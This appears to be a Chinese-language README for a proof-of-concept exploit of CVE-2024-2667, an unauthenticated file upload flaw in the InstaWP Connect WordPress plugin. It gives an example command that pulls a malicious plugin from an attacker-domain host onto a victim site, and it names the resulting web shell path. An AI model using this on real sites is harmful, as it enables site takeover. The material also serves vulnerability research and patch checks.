CVE-2024-2667-Poc 🚀
描述
WordPress 的 InstaWP Connect – 1-click WP Staging & Migration 插件在 0.1.0.22 及更早的所有版本中,因 /wp-json/instawp-connect/v1/config REST API 端点对文件的验证不足而存在任意文件上传漏洞,这使得未经身份验证的攻击者能够上传任意文件。
脚本使用指南 ⚙️
安装依赖
| 描述 | 详细信息 | 图标 |
|---|
| 安装所需库 | 使用 pip 安装所需的 Python 库:requests 和 beautifulsoup4。 | 🛠️ |
| 安装命令 | 运行:pip install requests beautifulsoup4。 | 📥 |
运行脚本
| 描述 | 详细信息 | 图标 |
|---|
| 执行脚本 | 使用命令行并携带所需参数运行脚本。 | 🚀 |
| 必需参数 | - -up:插件 URL(例如 http://attacker-domain/malicious-plugin.zip)。 | |
| - -u:目标 WordPress URL(例如 http://victim-domain/)。 | 🔧 |
| 示例命令 | python CVE-2024-2667.py -up http://attacker-domain/malicious-plugin.zip -u http://victim-domain/ | 📜 |
漏洞检查
| 描述 | 详细信息 | 图标 |
|---|
| 版本检查 | 脚本会检查目标插件的 readme.txt 文件以获取版本信息。 | 🔍 |
| 存在漏洞的版本 | 如果版本为 <= 0.1.0.22,脚本将输出:The site is vulnerable. | ⚠️ |
| 安全版本 | 如果版本为 > 0.1.0.22,脚本将输出:The site is not vulnerable. | ✅ |
Shell 位置
| 描述 | 详细信息 | 图标 |
|---|
| Shell 路径 | 如果上传成功,可通过以下路径访问 shell: | 🐚 |
| wp-content/plugins/instawp-connect/shell.php。 | |
用法 -help
usage: CVE-2024-2667.py [-h] -up URL_PLUGIN -u URL_TARGET
The InstaWP Connect – 1-click WP Staging & Migration plugin for WordPress is vulnerable to arbitrary file uploads due
to insufficient file validation in the /wp-json/instawp-connect/v1/config REST API endpoint in all versions up to, and
including, 0.1.0.22. This makes it possible for unauthenticated attackers to upload arbitrary files.
options:
-h, --help show this help message and exit
-up URL_PLUGIN, --url_plugin URL_PLUGIN
URL of the plugin (e.g., http://attacker-domain/malicious-plugin.zip).
-u URL_TARGET, --url_target URL_TARGET
URL of the target WordPress site (e.g., http://victim-domain/).